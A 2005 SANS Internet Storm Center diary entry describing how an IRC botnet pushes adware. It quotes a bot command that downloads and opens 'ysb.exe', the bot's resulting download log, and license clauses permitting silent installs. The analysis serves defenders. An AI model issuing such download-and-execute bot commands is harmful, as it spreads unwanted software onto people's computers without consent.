Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Botnets and Adwares-Spywares connection SANS ISC InfoSec Forums

Participate: Learn more about our honeypot network

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Botnets and Adwares-Spywares connection

I am sure you already know about botnets, right? Ok, I am quite sure that you also know that one of the purposes of the botnets, besides all the nice stuff written by our Handler Mike Poor in his diary Big Business surrounding Internet Fraud , is to spread malware, right? Ok (again), today I would like to show you how the botnets are also spreading adware/spyware softwares. As the bot is remotely controlled by the botnet owner, it can do anything...
While investigating a bot today, I found this instruction to the bot:

:MySQL 332 USA|xxxxxxx #c :xdownload32 c:\ysb.exe 1

This instruction told to my bot to download the ysb.exe 'software' to my computer and open it, as the next messages can show:

#c :[DOWNLOAD]: Downloading URL: to: c:\ysb.exe.
#c :[DOWNLOAD]: Downloaded 67.3 KB to c:\ysb.exe @ 33.6 KB/sec.
#c :[DOWNLOAD]: Opened: c:\ysb.exe.

As soon as it downloaded it oppened it, this window came up:

This 'software' is recognized by some AV at VirusTotal as a downloader or ISTbar.
Nice points from the License Agreement:

9. OTHER SOFTWARE. You allow that third party software may be installed in the Software and the Integrated Search Technologies shall not be liable to anyone with respect to such third party software.
16. UPDATES. You grant Integrated Search Technologies permission to add/remove features and/or functions to the existing Software and/or Service, or to install new applications or third party software, at any time, in its sole discretion with or without your knowledge and/or interaction. By doing so, you agree to the terms of the new applications. You also grant Integrated Search Technologies permission to make any changes to the Software and/or Service provided at any time.

Ok, ok...old stuff, but always nice to know how these things suddenly appears in your computer...:)
Handler on Duty: Pedro Bueno


155 Posts
ISC Handler
Nov 2nd 2005

Sign Up for Free or Log In to start participating in the conversation!